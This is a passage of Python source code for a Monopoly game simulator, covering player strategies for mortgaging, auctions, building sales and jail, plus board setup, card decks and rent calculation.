out.\n game_info.exchange_money(amount=50, giver=self, receiver=game_info.bank, summary=\"Paying out of Jail.\")\n\n\n # Sell back one house or hotel on a property or sell all buildings back.\n def sell_building(self, property, building, game_info):\n # Sell one house on the property.\n if building == \"house\":\n property.buildings -= 1\n game_info.houses += 1\n self.money += property.house_cost / 2\n\n # Downgrade from a hotel to 4 houses.\n elif building == \"hotel\":\n property.buildings -= 1\n game_info.hotels += 1\n game_info.houses -= 4\n self.money += property.house_cost / 2\n\n # Sell all buildings on the property.\n elif building == \"all\": # The property has a hotel.\n if property.buildings == 5:\n property.buildings = 0\n game_info.hotels += 1\n self.money += (property.house_cost / 2) * 5\n else: # The property has houses.\n game_info.houses += property.buildings\n self.money += (property.house_cost / 2) * property.buildings\n property.buildings = 0\n\n # Decides how player's make funds if they are in the hole.\n def make_funds(self, game_info):\n # # Mortgage properties if they are not in a monopoly. # #\n\n for board_space in self.inventory: # Cycle through the player's properties.\n if (board_space.group not in self.monopolies) and (not board_space.mortgaged):\n mortgage_value = board_space.price / 2 # Find the mortgage value.\n self.money += mortgage_value # Gain the mortgage value.\n board_space.mortgaged = True # Mortgage property.\n pass # ##print(\"player\",self.number,\"mortgaged\",board_space.name)\n if self.money > 0: # Check if the player is out of the hole.\n return # Exit function.\n\n # # Sell houses and hotels. # #\n\n # Check if the player has any monopolies\n if self.monopolies:\n\n # Initial condition.\n keep_selling = True\n\n while keep_selling:\n keep_selling = False\n for board_space in self.inventory:\n # It has buildings and we are selling \"evenly\".\n if board_space.buildings > 0 and self.even_selling_test(board_space):\n keep_selling = True # We should check again.\n if board_space.buildings == 5: # It's a hotel.\n if game_info.houses >= 4: # Check if there are 4 houses to replace the hotel.\n self.sell_building(board_space, \"hotel\", game_info) # Hotel - > 4 Houses\n else: # Not enough houses to break hotel.\n for board_space2 in self.inventory: # Sell back all buildings in GROUP.\n if board_space2.group == board_space.group:\n self.sell_building(board_space2, \"all\", game_info)\n else: # It's a house.\n self.sell_building(board_space, \"house\", game_info)\n if self.money > 0: # The player is out of the hole.\n return # Exit\n\n # # Mortgage properties in monopolies. # #\n\n for board_space in self.inventory: # Cycle through all board spaces.\n if not board_space.mortgaged:\n if board_space.group not in self.monopolies:\n pass # ##print('eee error')\n mortgage_value = board_space.price / 2 # Find the mortgage value.\n self.money += mortgage_value # Gain the mortgage value.\n board_space.mortgaged = True # Mortgage property.\n pass # ##print(\"player\",self.number,\"mortgaged\",board_space.name)\n if self.money > 0: # Check if the player is out of the hole.\n return # Exit function.\n\n # Allows the player to decide upon a jail strategy as soon as they are sent there.\n def set_jail_strategy(self, game_info):\n if self.smart_jail_strategy and game_info.first_building:\n self.jail_time = 3\n else:\n self.jail_time = self.init_jail_time\n\n # Decides if the player is selling evenly or not.\n def even_selling_test(self, property):\n for board_space in self.inventory:\n if board_space.group == property.group and board_space.buildings - property.buildings > 0:\n return False\n return True\n\n # Decides if the player is building evenly or not.\n def even_building_test(self, property):\n for board_space in self.inventory:\n if board_space.group == property.group and property.buildings - board_space.buildings > 0:\n return False\n return True\n\n # Calculate how much money a player has available to mortgage\n def find_available_mortgage_value(self):\n available_mortgage_value = 0\n for property in self.inventory:\n if property.buildings == 0 and not property.mortgaged and property.group not in self.monopolies:\n # Add mortgage value.\n available_mortgage_value += property.price / 2\n return available_mortgage_value\n\n # Decides how players make auction bids.\n def make_bid(self, property, game_info):\n # Reset these variables.\n self.bid_includes_mortgages = False\n self.mortgage_auctioned_property = False\n\n # If the player has a preference for the group.\n if property.group in self.group_preferences:\n self.auction_bid = self.money - 1\n\n # If the player will complete their group and wants to.\n if self.complete_monopoly == 1 and \\\n game_info.monopoly_status(player=self, current_property=property, additional_properties=[property]):\n self.auction_bid = self.money - 1\n\n # If the player wants to mortgage properties.\n elif self.complete_monopoly == 2 and \\\n game_info.monopoly_status(player=self, current_property=property, additional_properties=[property]):\n self.bid_includes_mortgages = True\n # Find all the money the player can use by mortgaging other properties.\n available_mortgage_value = self.find_available_mortgage_value()\n self.auction_bid = self.money + available_mortgage_value - 1\n else:\n self.auction_bid = self.money - self.get_buying_threshold(game_info)\n\n # The bid should be at least the mortgage value of the property.\n if self.auction_bid < property.price / 2:\n self.auction_bid = property.price / 2\n self.mortgage_auctioned_property = True\n\n # Allows a player to gather the funds needed to complete an auction.\n def make_auction_funds(self, game_info, winning_bid, property):\n # If the bid with intentions to mortgage it.\n if self.mortgage_auctioned_property:\n property.mortgaged = True\n self.money += property.price / 2\n\n # Special buying procedure if the player wants to mortgage properties.\n if self.bid_includes_mortgages:\n self.money -= winning_bid # Pay for property temporarily.\n\n # Make up the funds.\n property_index = 0\n while self.money <= 0:\n c_property = self.inventory[property_index]\n if c_property.buildings == 0 and not c_property.mortgaged and c_property.group not in self.monopolies:\n c_property.mortgaged = True\n pass # ##print(\"player\",self.number,\"mortgaged\",c_property.name)\n self.money += c_property.price / 2\n property_index += 1\n\n self.money += winning_bid # Pay money back.\n\n # Decides what the player does when he lands on an unowned property.\n def unowned_property_action(self, game_info, property):\n # The player has enough money to buy the property.\n if self.money - property.price >= self.get_buying_threshold(game_info):\n game_info.buy_property(self, property)\n return True\n\n # The player has a preference for the group and will pay any money they have.\n if property.group in self.group_preferences and self.money - property.price > 0:\n game_info.buy_property(self, property)\n return True\n\n # The player will gain a monopoly, they want to complete the group, they have the money.\n if self.complete_monopoly == 1 and self.money - property.price > 0 and \\\n game_info.monopoly_status(self, property, additional_properties=[property]):\n game_info.buy_property(self, property)\n return True\n\n # The player will mortgage other properties to buy it if it completes a group.\n if self.complete_monopoly == 2 and \\\n game_info.monopoly_status(self, property, additional_properties=[property]):\n # Find all the money the player can use by mortgaging other properties.\n available_mortgage_value = self.find_available_mortgage_value()\n\n # If the player can mortgage to buy, they will.\n if (self.money + available_mortgage_value) - property.price > 0:\n self.money += -property.price # Pay for property.\n\n # Make up the funds.\n property_index = 0\n while self.money <= 0:\n c_property = self.inventory[property_index]\n if c_property.buildings == 0 and not c_property.mortgaged and c_property.group not in self.monopolies:\n c_property.mortgaged = True\n pass # ##print(\"player\",self.number,\"unmortgaged\",c_property.name)\n self.money += c_property.price / 2\n property_index += 1\n\n game_info.unowned_properties.remove(property) # Remove property from unowned properties list.\n self.inventory.append(property)\n self.add_monopoly(property.group) # Add the group to the player's list of monopolies.\n return True\n\n return False\n\n # Allow the player to make a decision about getting out of jail.\n def jail_decision(self, game_info):\n if self.jail_counter - 1 == self.jail_time:\n return True\n else:\n return False\n\n def highest_possible_rent(self, game_info):\n highest_possible_rent = 0\n for player in game_info.active_players:\n if player != self:\n for property in player.inventory:\n temp = game_info.calculate_rent(owner=player, property=property)\n if temp > highest_possible_rent:\n highest_possible_rent = temp\n return highest_possible_rent\n\n # Return buying threshold at current point in game\n def get_buying_threshold(self, game_info):\n if self.evolving_threshold > 0:\n addition = self.highest_possible_rent(game_info)\n # print(addition)\n return self.buying_threshold + (self.evolving_threshold * addition)\n else:\n return self.buying_threshold\n\n\n# Define the MoneyPool class.\nclass MoneyPool:\n def __init__(self, money):\n self.money = money\n\n\n# Define the BoardLocation class.\nclass BoardLocation:\n def __init__(self, id, name, price=0, group=\"none\", rents=(0, 0, 0, 0, 0, 0), house_cost=0):\n self.id = id\n self.name = name # The name of the board location.\n self.price = price # How much it costs to buy the property.\n self.rents = rents # The various rents.\n self.house_cost = house_cost # How much it costs for a house.\n self.group = group # Which group the property belongs to.\n self.buildings = 0 # The property starts with no development.\n self.visits = 0 # Hit counter.\n self.mortgaged = False\n self.owned = False\n\n\n# Define the Game class.\nclass Game:\n def __init__(self, list_of_players, auctions_enabled=True, trading_enabled=False,\n hotel_upgrade=False, building_sellback=False, new_trading=False, complex_trading=False,\n complex_trading2=False, property_trading=False, discrete_property_trading=False,\n free_parking_pool=False, double_on_go=False, no_rent_in_jail=False, trip_to_start=False,\n snake_eyes_bonus=False, cutoff=1000):\n self.active_players = list_of_players # Create a list of players.\n self.inactive_players = [] # An empty list to store losing players.\n self.turn_counter = 0 # Reset turn counter.\n self.doubles_counter = 0 # Reset doubles counter.\n self.houses = 32 # House supply.\n self.hotels = 12 # Hotel supply.\n self.winner = 1000 # Ending game data.\n self.dice_roll = 0 # The current dice roll can be accessible everywhere.\n\n self.auctions_enabled = auctions_enabled # A toggle to disable auctions.\n self.trading_enabled = trading_enabled\n self.hotel_upgrade = hotel_upgrade\n self.building_sellback = building_sellback\n self.new_trading = new_trading\n self.complex_trading = complex_trading\n self.complex_trading2 = complex_trading2\n self.property_trading = property_trading\n self.discrete_property_trading = discrete_property_trading\n self.first_building = False # Records whether a building has been bought for smart_jail_strategy\n self.cutoff = cutoff # Determines when a game should be terminated.\n self.loss_reason = [] # To store how a player lost the game.\n self.starting_player = 0 # Store which player started.\n self.create_board() # Set-up the board.\n self.create_cards() # Shuffle both card decks.\n\n best_property_values = [0 for i in range(40)]\n self.players_with_best_property_values = [None for i in range(40)]\n\n for player in self.active_players:\n for i in range(40):\n if player.property_values[i] > best_property_values[i]:\n best_property_values[i] = player.property_values[i]\n self.players_with_best_property_values[i] = player\n\n\n # Money pools.\n self.bank = MoneyPool(12500) # Create the bank.\n self.free_parking = MoneyPool(0) # Create the Free Parking pool.\n\n # Attributes for house rules.\n self.free_parking_pool = free_parking_pool\n self.double_on_go = double_on_go\n self.no_rent_in_jail = no_rent_in_jail\n self.trip_to_start = trip_to_start\n self.snake_eyes_bonus = snake_eyes_bonus\n\n\n # Create list of numbers to represent Chance and Community Chest cards.\n def create_cards(self):\n # Create cards.\n self.chance_cards = [i for i in range(1, 16 + 1)]\n self.community_chest_cards = [i for i in range(1, 16 + 1)]\n\n # Shuffle cards.\n shuffle(self.chance_cards)\n shuffle(self.community_chest_cards)\n\n # Reset index.\n self.chance_index = 0\n self.community_chest_index = 0\n\n # Creates a BoardLocation object for each space on the board.\n def create_board(self):\n # \"Name\", Price, \"Group\", (Rents), House Cost\n self.board = [\n BoardLocation(0, \"Go\"),\n BoardLocation(1, \"Mediterranean Ave.\", 60, \"Brown\", (2, 10, 30, 90, 160, 250), 50),\n BoardLocation(2, \"Community Chest\"),\n BoardLocation(3, \"Baltic Ave.\", 60, \"Brown\", (4, 20, 60, 180, 320, 450), 50),\n BoardLocation(4, \"Income Tax\"),\n BoardLocation(5, \"Reading Railroad\", 200, \"Railroad\"),\n BoardLocation(6, \"Oriental Ave.\", 100, \"Light Blue\", (6, 30, 90, 270, 400, 550), 50),\n BoardLocation(7, \"Chance\"),\n BoardLocation(8, \"Vermont Ave.\", 100, \"Light Blue\", (6, 30, 90, 270, 400, 550), 50),\n BoardLocation(9, \"Connecticut Ave.\", 120, \"Light Blue\", (8, 40, 100, 300, 450, 600), 50),\n BoardLocation(10, \"Just Visiting / In Jail\"),\n BoardLocation(11, \"St. Charles Place\", 140, \"Pink\", (10, 50, 150, 450, 625, 750), 100),\n BoardLocation(12, \"Electric Company\", 150, \"Utility\"),\n BoardLocation(13, \"States Ave.\", 140, \"Pink\", (10, 50, 150, 450, 625, 750), 100),\n BoardLocation(14, \"Virginia Ave.\", 160, \"Pink\", (12, 60, 180, 500, 700, 900), 100),\n BoardLocation(15, \"Pennsylvania Railroad\", 200, \"Railroad\"),\n BoardLocation(16, \"St. James Place\", 180, \"Orange\", (14, 70, 200, 550, 750, 950), 100),\n BoardLocation(17, \"Community Chest\"),\n BoardLocation(18, \"Tennessee Ave.\", 180, \"Orange\", (14, 70, 200, 550, 750, 950), 100),\n BoardLocation(19, \"New York Ave.\", 200, \"Orange\", (16, 80, 220, 600, 800, 1000), 100),\n BoardLocation(20, \"Free Parking\"),\n BoardLocation(21, \"Kentucky Ave.\", 220, \"Red\", (18, 90, 250, 700, 875, 1050), 150),\n BoardLocation(22, \"Chance\"),\n BoardLocation(23, \"Indiana Ave.\", 220, \"Red\", (18, 90, 250, 700, 875, 1050), 150),\n BoardLocation(24, \"Illinois Ave.\", 240, \"Red\", (20, 100, 300, 750, 925, 1100), 150),\n BoardLocation(25, \"B. & O. Railroad\", 200, \"Railroad\"),\n BoardLocation(26, \"Atlantic Ave.\", 260, \"Yellow\", (22, 110, 330, 800, 975, 1150), 150),\n BoardLocation(27, \"Ventnor Ave.\", 260, \"Yellow\", (22, 110, 330, 800, 975, 1150), 150),\n BoardLocation(28, \"Water Works\", 150, \"Utility\"),\n BoardLocation(29, \"Marvin Gardens\", 280, \"Yellow\", (24, 120, 360, 850, 1025, 1200), 150),\n BoardLocation(30, \"Go to Jail\"),\n BoardLocation(31, \"Pacific Ave.\", 300, \"Green\", (26, 130, 390, 900, 1100, 1275), 200),\n BoardLocation(32, \"North Carolina Ave.\", 300, \"Green\", (26, 130, 390, 900, 1100, 1275), 200),\n BoardLocation(33, \"Community Chest\"),\n BoardLocation(34, \"Pennsylvania Ave.\", 320, \"Green\", (28, 150, 450, 1000, 1200, 1400), 200),\n BoardLocation(35, \"Short Line Railroad\", 200, \"Railroad\"),\n BoardLocation(36, \"Chance\"),\n BoardLocation(37, \"Park Place\", 350, \"Dark Blue\", (35, 175, 500, 1100, 1300, 1500), 200),\n BoardLocation(38, \"Luxury Tax\"),\n BoardLocation(39, \"Boardwalk\", 400, \"Dark Blue\", (50, 200, 600, 1400, 1700, 2000), 200),\n ]\n\n # Copy the board to create a linked list of unowned properties.\n self.unowned_properties = []\n self.unowned_properties.extend(self.board)\n\n # Remove initial properties.\n for player in self.active_players:\n if player.initial_inventory:\n for id in player.initial_inventory:\n player.inventory.append(self.board[id])\n self.unowned_properties.remove(self.board[id])\n\n # Test for monopolies.\n for property in player.inventory:\n if property.group not in [\"Utility\", \"Railroad\"]:\n property.buildings = 0\n if property.group not in player.monopolies:\n if self.monopoly_status(player, property):\n player.add_monopoly(property.group)\n\n def get_roll(self):\n return randint(1, 6)\n\n # Defines the actions of the Community Chest cards.\n def community_chest(self, player):\n card = self.community_chest_cards[self.community_chest_index]\n if card == 1: # GET OUT OF JAIL FREE\n player.community_chest_card = True # Give the card to the player.\n self.community_chest_cards.remove(1) # Remove the card from the list\n elif card == 2: # PAY SCHOOL FEES OF $50 [UPDATED IN 2008]\n self.exchange_money(amount=50, giver=player, receiver=self.free_parking, summary=\"Community Chest.\")\n elif card == 3: # IT IS YOUR BIRTHDAY. / COLLECT $10 / FROM EVERY PLAYER [UPDATED IN 2008]\n for individual in self.active_players: # For each player...\n self.exchange_money(amount=10, giver=individual, receiver=player, summary=\"Community Chest.\")\n elif card == 4: # XMAS FUND MATURES / COLLECT $100\n self.exchange_money(amount=100, giver=self.bank, receiver=player, summary=\"Community Chest.\")\n elif card == 5: # INCOME TAX REFUND / COLLECT $20\n self.exchange_money(amount=20, giver=self.bank, receiver=player, summary=\"Community Chest.\")\n elif card == 6: # YOU INHERIT $100\n self.exchange_money(amount=100, giver=self.bank, receiver=player, summary=\"Community Chest.\")\n elif card == 7: # YOU HAVE WON SECOND PRIZE IN A BEAUTY CONTEST / COLLECT $10\n self.exchange_money(amount=10, giver=self.bank, receiver=player, summary=\"Community Chest.\")\n elif card == 8: # BANK ERROR IN YOUR FAVOR / COLLECT $200\n self.exchange_money(amount=200, giver=self.bank, receiver=player, summary=\"Community Chest.\")\n elif card == 9: # RECEIVE $25 / CONSULTANCY FEE [WORDING UPDATED IN 2008]\n self.exchange_money(amount=25, giver=self.bank, receiver=player, summary=\"Community Chest.\")\n elif card == 10: # ADVANCE TO GO (COLLECT $200)\n self.move_to(player, 0) # Player moves to Go.\n elif card == 11: # YOU ARE ASSESSED FOR STREET REPAIRS\n if player.monopolies:\n house_counter = 0\n hotel_counter = 0\n for board_space in player.inventory: # Cycle through all board spaces.\n if board_space.buildings == 5:\n hotel_counter += 1 # Add hotels.\n else:\n house_counter += board_space.buildings # Add houses.\n house_repairs = 40 * house_counter # $40 PER HOUSE\n hotel_repairs = 115 * hotel_counter # $115 PER HOTEL\n self.exchange_money(amount=house_repairs + hotel_repairs, giver=player, receiver=self.free_parking,\n summary=\"Community Chest.\")\n elif card == 12: # LIFE INSURANCE MATURES / COLLECT $100\n self.exchange_money(amount=100, giver=self.bank, receiver=player, summary=\"Community Chest.\")\n elif card == 13: # DOCTOR'S FEE / PAY $50\n self.exchange_money(amount=50, giver=player, receiver=self.free_parking, summary=\"Community Chest.\")\n elif card == 14: # FROM SALE OF STOCK / YOU GET $50 [UPDATED IN 2008]\n self.exchange_money(amount=50, giver=self.bank, receiver=player, summary=\"Community Chest.\")\n elif card == 15: # PAY HOSPITAL $100\n self.exchange_money(amount=100, giver=player, receiver=self.free_parking, summary=\"Community Chest.\")\n elif card == 16: # GO TO JAIL\n self.go_to_jail(player) # Send player to jail.\n\n if card == 1 and self.community_chest_index == 15: # GOOJF card was at the end.\n self.community_chest_index = 0 # Restart deck.\n elif card == 1: # GOOJF card was somewhere else.\n pass # Do not change index.\n else:\n self.community_chest_index = (self.community_chest_index + 1) % len(\n self.community_chest_cards) # Increase index.\n\n # Defines the actions of the Chance cards.\n def chance(self, player):\n card = self.chance_cards[self.chance_index]\n if card == 1: # GET OUT OF JAIL FREE\n player.chance_card = True # Give the card to the player.\n self.chance_cards.remove(1) # Remove the card from the list\n elif card == 2: # GO DIRECTLY TO JAIL\n self.go_to_jail(player) # Send player to jail.\n elif card == 3: # YOUR BUILDING LOAN MATURES / COLLECT $150\n self.exchange_money(amount=150, giver=self.bank, receiver=player, summary=\"Chance.\")\n elif card == 4: # GO BACK 3 SPACES\n player.position -= 3 # Move player.\n self.board[player.position].visits += 1 # Increase hit counter.\n self.board_action(player, self.board[player.position])\n elif card == 5 or card == 11: # ADVANCE TOKEN TO THE NEAREST RAILROAD\n if player.position == 7:\n self.move_to(player, 15)\n elif player.position == 22:\n self.move_to(player, 25)\n elif player.position == 36:\n self.move_to(player, 5)\n player.card_rent = True\n self.board_action(player, self.board[player.position])\n elif card == 6: # ADVANCE TO GO (COLLECT $200)\n self.move_to(player, 0) # Player moves to Go.\n elif card == 7: # ADVANCE TO ILLINOIS AVE.\n self.move_to(player, 24)\n self.board_action(player, self.board[player.position])\n elif card == 8: # MAKE GENERAL REPAIRS ON ALL YOUR PROPERTY\n if player.monopolies:\n house_counter = 0\n hotel_counter = 0\n for board_space in player.inventory: # Cycle through all board spaces.\n if board_space.buildings == 5:\n hotel_counter += 1 # Add hotels.\n else:\n house_counter += board_space.buildings # Add houses.\n house_repairs = 45 * house_counter # $45 PER HOUSE\n hotel_repairs = 100 * hotel_counter # $100 PER HOTEL\n self.exchange_money(amount=house_repairs + hotel_repairs, giver=player, receiver=self.free_parking,\n summary=\"Chance.\")\n elif card == 9: # ADVANCE TO ST. CHARLES PLACE\n self.move_to(player, 11)\n self.board_action(player, self.board[player.position])\n elif card == 10: # ADVANCE TOKEN TO NEAREST UTILITY\n if player.position == 7:\n self.move_to(player, 12)\n elif player.position == 22:\n self.move_to(player, 28)\n elif player.position == 36:\n self.move_to(player, 12)\n player.card_rent = True\n self.board_action(player, self.board[player.position])\n elif card == 12: # PAY POOR TAX OF $15\n self.exchange_money(amount=15, giver=player, receiver=self.free_parking, summary=\"Chance.\")\n elif card == 13: # TAKE A RIDE ON THE READING RAILROAD\n self.move_to(player, 5)\n self.board_action(player, self.board[player.position])\n elif card == 14: # ADVANCE TOKEN TO BOARD WALK [sic.]\n self.move_to(player, 39)\n self.board_action(player, self.board[player.position])\n elif card == 15: # PAY EACH PLAYER $50\n for individual in self.active_players: # For each player...\n self.exchange_money(amount=50, giver=player, receiver=individual, summary=\"Chance.\")\n elif card == 16: # BANK PAYS YOU DIVIDEND OF $50\n self.exchange_money(amount=50, giver=self.bank, receiver=player, summary=\"Chance.\")\n\n if card == 1 and self.chance_index == 15: # GOOJF card was at the end.\n self.chance_index = 0 # Restart deck.\n elif card == 1: # GOOJF card was somewhere else.\n pass # Do not change index.\n else:\n self.chance_index = (self.chance_index + 1) % len(self.chance_cards) # Increase index.\n\n # Moves a player ahead.\n def move_ahead(self, player, number_of_spaces):\n new_position = (player.position + number_of_spaces) % 40\n if new_position < player.position: # Does the player pass Go?\n # The player collects $200 for passing Go.\n self.exchange_money(amount=200, giver=self.bank, receiver=player, summary=\"$200 from Go.\")\n player.passed_go = True\n player.position = new_position # Update the player's position.\n self.board[new_position].visits += 1 # Increase hit counter.\n\n # Moves a player to a specific spot.(Used in cards.)\n def move_to(self, player, new_position):\n if new_position < player.position: # Does the player pass Go?\n # The player collects $200 for passing Go.\n self.exchange_money(amount=200, giver=self.bank, receiver=player, summary=\"$200 from Go.\")\n player.passed_go = True # Parameter for house rule.\n player.position = new_position # Update the player's position.\n self.board[new_position].visits += 1 # Increase hit counter.\n\n # Allows money to be exchanged between players or money pools.\n def exchange_money(self, giver, receiver, amount, summary):\n # Exchange the money.\n giver.money -= amount\n receiver.money += amount\n\n # If a player's money total went negative, allow them to make funds.\n for current_party in [receiver, giver]:\n if current_party.money <= 0 and isinstance(current_party, Player):\n current_party.make_funds(game_info=self)\n\n # Check if the player lost.\n if current_party.money <= 0:\n # Kick the player out.\n self.move_again = False # Stop the player's current turn.\n self.inactive_players.append(current_party) # And the player to the inactive players list.\n self.active_players.remove(current_party) # Remove the player from the active player's list.\n\n # Identify why the player lost.\n if summary[0] == \"Paying rent.\":\n property = summary[1]\n self.loss_reason = property.group\n else:\n self.loss_reason = summary\n\n # If there are still other players, give away the player's assets.\n if len(self.active_players) > 1:\n # Find other party.\n parties = [receiver, giver]\n parties.remove(current_party)\n other_party = parties[0]\n\n # Determine who the player lost to.\n if other_party == self.bank:\n # The player lost to the bank.\n self.bank += current_party.money\n # TODO Auction off all properties.\n else:\n # The player lost to another player.\n other_party.money += current_party.money\n other_party.inventory.extend(current_party.inventory)\n # Transfer GOOJF cards\n if current_party.chance_card:\n other_party.chance_card = True\n if current_party.community_chest_card:\n other_party.community_chest_card = True\n\n\n # Determines if the player owns all of the properties in the the given property's group.\n def monopoly_status(self, player, current_property, additional_properties=()):\n # Find the name of the property's group.\n group = current_property.group\n\n # There are no monopolies for board spaces, railroads or utilities.\n if group in [\"\", \"Railroad\", \"Utility\"]:\n return False # The property is not in a color group.\n\n # Count how many properties in the group that player owns.\n property_counter = 0 # Initialize counter.\n\n # Check all of the player's properties.\n for property in player.inventory:\n if property.group == group:\n property_counter += 1\n\n # Check additional properties.\n for property in additional_properties:\n if property.group == group:\n property_counter += 1\n\n # Return result.\n if property_counter == 3 and group in [\"Light Blue\", \"Pink\", \"Orange\", \"Red\", \"Yellow\", \"Green\"]:\n return True # The property is in a monopoly and a group of three.\n elif property_counter == 2 and group in [\"Dark Blue\", \"Brown\"]:\n return True # The property is in a monopoly and a group of two.\n else:\n return False # The player doesn't have a monopoly.\n\n # Sends a player to jail.\n def go_to_jail(self, player):\n player.position = 10 # Move player.\n self.board[10].visits += 1 # Increase hit counter.\n self.move_again = False # Prevent the player from moving again.\n player.in_jail = True # Set the player's Jail status to true.\n player.set_jail_strategy(self) # Allow the player to make strategy decisions.\n\n # Has a player buy a property.\n def buy_property(self, player, board_space, custom_price=False):\n # Allows a property to be bought at a custom price (used in auctions).\n if custom_price:\n self.exchange_money(amount=custom_price, giver=player, receiver=self.bank, summary=\"Buying property.\")\n pass # ##print(\"player\",player.number,\"bought\",board_space.name,\"(\",board_space.group,\") for\",custom_price)\n else:\n # Pay the money for the property.\n self.exchange_money(amount=board_space.price, giver=player, receiver=self.bank,\n summary=\"Paying property at auction.\")\n pass # ##print(\"player\",player.number,\"bought\",board_space.name,\"(\",board_space.group,\") for\",board_space.price)\n\n self.unowned_properties.remove(board_space) # Remove the property from the list of unowned properties.\n player.inventory.append(board_space) # Give the property to the player.\n\n # If the player has a completed a monopoly, add it to the player's list of monopolies.\n if self.monopoly_status(player, board_space):\n player.add_monopoly(board_space.group)\n pass # ##print(\"player\",player.number,\"MONOPOLIES\",player.monopolies)\n\n board_space.owned = True\n\n\n # Determine the owner of a property.\n def property_owner(self, property):\n\n # Find which player owns the property.\n for current_player in self.active_players:\n if property in current_player.inventory:\n return current_player\n\n # Return false is the property is unowned.\n return False\n\n # Determines the rent owed on a property.\n def calculate_rent(self, property, owner):\n # Rent for Railroads.\n if property.group == \"Railroad\":\n railroad_counter = 0\n for property in owner.inventory:\n if property.group == \"Railroad\":\n railroad_counter += 1\n rent = 25 * pow(2, railroad_counter - 1) # The rent.\n\n # Rent for Utilities.\n elif property.group == \"Utility\":\n utility_counter = 0\n for property in owner.inventory:\n if property.group == \"Utility\":\n utility_counter += 1\n if utility_counter == 2:\n rent = 70 # If the player owns both utilities, pay 10 times the dice.\n else:\n rent = 28 # If the player owns one utility, pay 4 times the dice.\n\n # Rent for color-group properties.\n else:\n if property.buildings == 5: # Check to see if there is a hotel.\n rent = property.rents[5] # Pay the 5th rent for a hotel.\n elif 0 < property.buildings < 5: # The property has houses.\n rent = property.rents[property.buildings]\n else:\n if property.group in owner.monopolies: # If the player has a monopoly...\n rent = property.rents[0] * 2 # Rent is doubled.\n else: # The player does not have a monopoly.\n rent = property.rents[0]\n\n return rent\n\n def calculate_rent_proportion(self, property, owner):\n # Rent for Railroads.\n if property.group == \"Railroad\":\n max_rent = 200\n rent = self.calculate_rent(property, owner) # 200\n # Rent for Utilities.\n elif property.group == \"Utility\":\n rent = 70\n max_rent = self.calculate_rent(property, owner) # 70\n\n # Rent for color-group properties.\n else:\n max_rent = property.rents[5]\n rent = self.calculate_rent(property, owner)\n\n return rent / max_rent\n\n\n # The player passed through pays rent to the player who owns the property the original player sits on..\n def pay_rent(self, player):\n # Find the property.\n current_property = self.board[player.position]\n\n # Find the owner of the property.\n owner = self.property_owner(current_property)\n\n # Exit if the owner is in jail and the \"no rent in jail\" house rule is in effect.\n if self.no_rent_in_jail and owner.in_jail:\n return\n\n # Rent for Railroads.\n if current_property.group == \"Railroad\":\n railroad_counter = 0\n for property in owner.inventory:\n if property.group == \"Railroad\":\n railroad_counter += 1\n rent = 25 * pow(2, railroad_counter - 1) # The rent.\n if player.card_rent: # Rent is double for the railroad cards.\n rent *= 2\n\n # Rent for Utilities.\n elif current_property.group == \"Utility\":\n # Roll the dice.\n die1 = self.get_roll()\n die2 = self.get_roll()\n self.dice_roll = die1 + die2\n\n # Check for snakes eyes.\n if self.snake_eyes_bonus and die1 == 1 == die2:\n self.exchange_money(amount=500, giver=self.bank, receiver=player, summary=\"Snake eyes bonus.\")\n\n utility_counter = 0\n for property in owner.inventory:\n if property.group == \"Utility\":\n utility_counter += 1\n if utility_counter == 2 or player.card_rent:\n rent = self.dice_roll * 10 # If the player owns both utilities, pay 10 times the dice.\n else:\n rent = self.dice_roll * 4 # If the player owns one utility, pay 4 times the dice.\n\n # Rent for color-group properties.\n else:\n if current_property.buildings == 5: # Check to see if there is a hotel.\n rent = current_property.rents[5] # Pay the 5th rent for a hotel.\n elif 0 < current_property.buildings < 5: # The property has houses.\n rent = current_property.rents[current_property.buildings]\n else:\n if current_property.group in owner.monopolies: # If the player has a monopoly...\n rent = current_property.rents[0] * 2 # Rent is doubled.\n else: # The player does not have a monopoly.\n rent = current_property.rents[0]\n\n # Pay the rent.\n summary = [\"Paying rent.\", current_property]\n\n self.exchange_money(amount=rent, giver=player, receiver=owner, summary=summary)\n\n\n # Handles auctions when a property is not bought.\n def auction(self, board_space):\n # Each player makes a bid on the property.\n for current_player in self.active_players:\n current_player.make_bid(game_info=self, property=board_space)\n\n # The two-player case.\n player1 = self.active_players[0]\n player2 = self.active_players[1]\n\n # The property is not bought.\n if player1.auction_bid < 1 and player2.auction_bid < 1:\n return # Exit function.\n\n # Player 1 buys it at $1\n elif player1.auction_bid > 0 and player2.auction_bid < 1:\n winning_bid = 1\n winning_player = player1\n\n # Player 2 buys it at $1\n elif player1.auction_bid < 1 and player2.auction_bid > 0:\n winning_bid = 1\n winning_player = player2\n\n # The bids tie. A random player buys the property.\n elif player1.auction_bid == player2.auction_bid:\n random_player = choice([player1, player2])\n winning_bid = random_player.auction_bid\n winning_player = random_player\n\n # Player 1 has a higher bid.\n elif player1.auction_bid > player2.auction_bid:\n winning_bid = player2.auction_bid + 1\n winning_player = player1\n\n # Player 2 has a higher bid.\n elif player2.auction_bid > player1.auction_bid:\n winning_bid = player1.auction_bid + 1\n winning_player = player2\n else:\n pass # ##print('error 8')\n return\n\n winning_player.make_auction_funds(winning_bid=winning_bid, property=board_space, game_info=self)\n self.buy_property(winning_player, board_space, custom_price=winning_bid)\n\n\n # Find the liquid wealth of all of the player's properties.\n def total_assets(self, player):\n liquid_property = 0 # The liquidated property wealth of the player.\n for board_space in player.inventory:\n liquid_property += board_space.price\n\n liquid_buildings = 0 # The cost of all buildings the player owns.\n for board_space in player.inventory:\n liquid_buildings += board_space.buildings * board_space.house_cost # Add the price of the buildings.\n\n all_assets = player.money + liquid_property + liquid_buildings\n return all_assets\n\n # Calculate the cost to un-mortgage a given property.\n def unmortgage_price(self, property):\n return int(round(Decimal(str(1.1 * (property.price / 2))), 0))\n\n # Decides what a player does on a property,\n def property_action(self, player, board_space):\n if board_space in player.inventory:\n return # The player owns the property. Nothing happens.\n elif board_space.mortgaged:\n return # The property is mortgaged. Nothing happens.\n elif board_space in self.unowned_properties: # The property is unowned.\n if self.trip_to_start and (not player.passed_go):\n return # The player has to wait to pass Go to buy/auction a property.\n else: # The player can buy it.\n if not player.unowned_property_action(game_info=self, property=board_space):\n # The player can't buy it or decides not to.\n if self.auctions_enabled: # If auctions are enabled...\n self.auction(board_space) # The property is auctioned.\n else: # The property is owned by another player.\n self.pay_rent(player) # The player pays the owner rent.\n\n # Decide what the player should do on a given board space.\n def board_action(self, player, board_space):\n if board_space.name == \"Just Visiting / In Jail\":\n pass # Nothing happens on Go or Just Visiting.\n\n elif board_space.name == \"Go\":\n # Give the player an extra $200 if the house rule is enabled.\n if 